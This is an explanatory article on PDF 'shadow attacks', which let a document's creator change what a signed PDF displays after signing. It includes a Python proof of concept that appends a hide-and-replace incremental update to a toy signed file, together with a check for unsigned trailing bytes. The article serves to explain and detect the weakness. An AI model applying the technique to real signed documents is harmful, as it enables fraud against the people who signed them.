The more complex a format is, the less likely its security features are to hold in every case. A newly reported weakness lets an attacker alter digitally signed PDF documents without invalidating the signature. A German team at Ruhr University Bochum discovered the “shadow attack” class of vulnerabilities in the format. The attack presupposes that the attacker controlled the document before it was signed: the victim sees one version of the content and signs it; the dishonest creator gets the signed file back, changes what it displays, and passes it on.
A digital signature on a PDF confirms the signer’s identity, indicates assent to the document, and makes it tamper-evident. A signed file is, for all practical purposes, impossible to alter without invalidating the signature. However, there’s a catch. The signature doesn’t cover the file as a whole; it covers a declared byte range, essentially everything present at signing time except the signature value itself, and anything appended afterwards lies outside it. There are reasons for this design. For example, a document may need several signatures, each added after the previous one.
PDF files are modified in a clunky but deliberate way: new objects, and replacements for existing ones, are appended to the end of the file together with a new cross-reference section and trailer, without rewriting any existing bytes. The specification calls this an incremental update, also known as incremental saving (IS). A signed file can be updated the same way. The signature still verifies, because the bytes it covers are unchanged; the appended material is simply outside it, and there is no limit to how much can be appended. Viewer applications do, however, warn the user when a signed file has been modified after signing.
The question is exactly what “modified” means. For convenience, changes that normal workflows produce, such as adding another signature, filling in form fields, or adding annotations, are not treated as tampering and trigger no warning. There is no universally accepted standard for what counts as a real modification; different PDF readers perform different checks. This leaves a lot of room for tinkering with a file without setting off any alarms.
The research team found an assortment of ways to exploit this. In broad terms, they fall into three categories.
- Hide. An overlay, such as an image, covers content that the signer never sees. After signing, the attacker appends an update that makes the overlay invisible, revealing the previously masked layer behind it.
- Replace. New elements that viewers treat as harmless are appended to the signed document to alter its appearance. For instance, the attacker can supply a new definition for a font the document already uses, so that the same character codes render as different glyphs.
- Hide and replace. The simplest and most dangerous variant. The document presented for signing contains a complete “shadow” document that the signer never sees and that can differ entirely from the visible one. After signing, the attacker appends an update that changes a single reference so that it points at the shadow content instead of the previously visible content.
The authors propose a countermeasure that requires no change to the specification, only a new convention in viewer applications: once a document has been signed, any further revision must itself be signed, and a viewer that finds an unsigned revision after a signature should alert the user. It’s not clear how much this will help. Recipients will see a document whose latest revision is fully signed, and unless they compare that signature carefully with the earlier one, they may not realize that the final signature covers major changes.
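The following Python is an added example, not code from the paper or from any PDF tool. It ties together the incremental-update mechanism described above, the hide-and-replace variant, and the check behind the authors’ proposed viewer rule: it builds a minimal signed PDF, appends an update that re-points the page’s content at a shadow stream without touching a single signed byte, and then flags the bytes that lie beyond the signed /ByteRange. Everything in it is constructed for illustration: the object numbers, the “Pay 100 EUR” and “Pay 100000 EUR” content streams, and the signature dictionary, whose /Contents value is a zero-filled placeholder rather than a real PKCS#7 signature. No cryptography is performed; only the byte-range arithmetic is checked.

```python
import re

# Constructed sample document (not from the paper): one page whose content is
# object 4 (what the signer sees), a "shadow" content stream in object 5 that
# nothing references yet, and a signature dictionary in object 6 whose
# /ByteRange covers the entire original file. The signature value is a
# zero-filled placeholder; no cryptographic signing or verification happens here.
VISIBLE = b"BT /F1 24 Tf 72 700 Td (Pay 100 EUR) Tj ET"
SHADOW = b"BT /F1 24 Tf 72 700 Td (Pay 100000 EUR) Tj ET"
PAGE = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents %d 0 R /Annots [7 0 R] >>"


def stream(data):
    return b"<< /Length %d >>\nstream\n%s\nendstream" % (len(data), data)


def build_pdf(objects):
    """Serialise (number, body) pairs followed by a classic xref table and trailer."""
    out = b"%PDF-1.7\n"
    offsets = {}
    for num, body in objects:
        offsets[num] = len(out)
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref = len(out)
    size = len(objects) + 1
    out += b"xref\n0 %d\n0000000000 65535 f \n" % size
    for num in range(1, size):
        out += b"%010d 00000 n \n" % offsets[num]
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (size, xref)
    return out


def signed_base():
    """The document as the victim signs it. Built twice so that the fixed-width
    /ByteRange can be filled with the real offsets of the /Contents hole."""
    def objects(byterange):
        return [
            (1, b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /SigFlags 3 /Fields [7 0 R] >> >>"),
            (2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>"),
            (3, PAGE % 4),
            (4, stream(VISIBLE)),
            (5, stream(SHADOW)),
            (6, b"<< /Type /Sig /Filter /Adobe.PPKLite /SubFilter /adbe.pkcs7.detached"
                b" /ByteRange [%s] /Contents <%s> >>" % (byterange, b"00" * 64)),
            (7, b"<< /Type /Annot /Subtype /Widget /FT /Sig /T (sig1) /V 6 0 R /P 3 0 R /Rect [0 0 0 0] >>"),
        ]
    draft = build_pdf(objects(b"0 %010d %010d %010d" % (0, 0, 0)))
    hole = draft.index(b"/Contents <") + len(b"/Contents ")  # start of the <hex> signature value
    hole_end = draft.index(b">", hole) + 1
    return build_pdf(objects(b"0 %010d %010d %010d" % (hole, hole_end, len(draft) - hole_end)))


def shadow_update(signed):
    """The attacker's incremental update (hide-and-replace): a new copy of the page
    object whose /Contents points at the shadow stream. Every signed byte stays intact."""
    prev = int(re.findall(rb"startxref\s+(\d+)", signed)[-1])
    obj_off = len(signed)
    update = b"3 0 obj\n%s\nendobj\n" % (PAGE % 5)
    xref_off = obj_off + len(update)
    update += b"xref\n3 1\n%010d 00000 n \n" % obj_off
    update += b"trailer\n<< /Size 8 /Root 1 0 R /Prev %d >>\nstartxref\n%d\n%%%%EOF\n" % (prev, xref_off)
    return signed + update


def revisions(pdf):
    """Offsets of every xref section, oldest first: start at the last startxref
    and follow each trailer's /Prev link backwards."""
    pos = int(re.findall(rb"startxref\s+(\d+)", pdf)[-1])
    chain = []
    while pos is not None:
        chain.append(pos)
        m = re.search(rb"/Prev\s+(\d+)", pdf[pos:pdf.index(b"%%EOF", pos)])
        pos = int(m.group(1)) if m else None
    return chain[::-1]


def resolve(pdf, num):
    """Byte offset of object `num`. The newest xref section that lists it wins,
    which is exactly how an incremental update overrides an older object."""
    for xref in reversed(revisions(pdf)):
        lines = pdf[xref:pdf.index(b"trailer", xref)].split(b"\n")[1:]
        i = 0
        while i < len(lines) and lines[i].strip():
            first, count = map(int, lines[i].split())
            for k in range(count):
                i += 1
                off, _gen, kind = lines[i].split()
                if first + k == num and kind == b"n":
                    return int(off)
            i += 1
    raise KeyError(num)


def object_body(pdf, num):
    off = resolve(pdf, num)
    return pdf[off:pdf.index(b"endobj", off)]


def visible_text(pdf):
    """What a viewer renders: the (toy) text operand of the page's current content stream."""
    page = object_body(pdf, 3)
    contents = int(re.search(rb"/Contents\s+(\d+)\s+0\s+R", page).group(1))
    return re.search(rb"\((.*?)\)\s*Tj", object_body(pdf, contents)).group(1).decode()


def unsigned_tail(pdf):
    """Bytes beyond the end of the last signed /ByteRange. The proposed viewer rule
    amounts to: if this is non-zero and the tail carries no signature of its own, alert."""
    ends = [int(m.group(3)) + int(m.group(4)) for m in
            re.finditer(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]", pdf)]
    return len(pdf) - max(ends) if ends else len(pdf)


if __name__ == "__main__":
    signed = signed_base()
    attacked = shadow_update(signed)
    assert attacked.startswith(signed)  # the signed bytes are untouched
    print("signer saw:    ", visible_text(signed), "| unsigned tail:", unsigned_tail(signed))
    print("recipient sees:", visible_text(attacked), "| unsigned tail:", unsigned_tail(attacked))
    print("revisions:", len(revisions(attacked)))
```

The point the run makes is that the signed file is a verbatim prefix of the attacked one, so any signature over it still verifies; what the recipient sees is decided entirely by the unsigned tail, where a newer cross-reference section overrides the page object. `unsigned_tail` is the whole of the proposed check. Bear in mind, as the page notes above, that legitimate workflows also produce unsigned tails (a viewer saving filled-in form fields, for instance), so a non-zero result justifies a warning, not a verdict. The text extractor is a toy that handles only a single uncompressed `Tj` operand; real documents have compressed streams, cross-reference streams and object streams, all of which a production check has to parse before it can compare revisions.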
PDF is collapsing under the weight of many revisions, variants, and features. It’s not clear whether there is a good fix.